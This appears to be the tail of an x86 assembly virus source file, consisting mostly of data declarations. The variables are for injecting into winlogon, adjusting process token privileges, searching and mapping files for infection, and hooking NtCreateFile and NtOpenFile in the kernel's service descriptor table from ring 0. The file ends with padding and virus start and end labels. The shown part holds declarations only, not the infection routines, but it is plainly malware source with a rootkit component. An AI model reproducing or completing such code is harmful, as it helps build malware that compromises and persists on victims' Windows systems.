win32kfuck db 'win32k.fuck',0
StartUnicode db '\',0,'?',0,'?',0,'\',0
WinlogonHand dd 0
WinlogonID dd 0
WinlogonModuleHand dd 0
WinlogonModuleName db 50 dup(?)
WinlogonVirusBase dd 0
tAdjustTokenPrivileges dd 0
tCloseHandle dd 0
tLookupPrivilegeValueA dd 0
tOpenProcessToken dd 0
tGetCurrentProcess dd 0
CurDir db 256 dup(0)
_WIN32_FIND_DATA WIN32_FIND_DATA ?
FileHandle dd 0
MappingHandle dd 0
ViewHandle dd 0
SearchHand dd 0
Buffer db 256 dup (?)
aux dd 0
KernelThreadHand dd 0
EntryPointWin32ksys dd 0
EntryPoint dd 0
KeServiceDescriptorTable dd 0
Ntoskrnl dd 0
SSDT dd 0
NtCreateFileAddr dd 0
NtOpenFileAddr dd 0
NtCreateFileEntryAddr dd 0
NtOpenFileEntryAddr dd 0
AttributesFileRing0 dd ?
CreateDispositionFileRing0 dd ?
CreateOptionsFileRing0 dd ?
FileNameRing0 unicode_string ?
StringRing0 dw 256 dup(0)
RootDirectoryRing0 dd 0
FileAttributesRing0 objects_attributes ?
io_statusRing0 pio_status ?
FileHandRing0 dd ?
SectionHandRing0 dd ?
SectionOffsetRing0 dq 0
SectionBaseAddressRing0 dd 0
SectionViewSizeRing0 dd 0
ZwMapViewOfSectionz dd 0
ZwCreateSectionz dd 0
ZwOpenFilez dd 0
ZwUnmapViewOfSectionz dd 0
ZwClosez dd 0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
padding:
PADDING equ 4 -(((padding - svirus) - (4*((padding - svirus)/4))))
db PADDING dup (00h)
evirus:
end start
end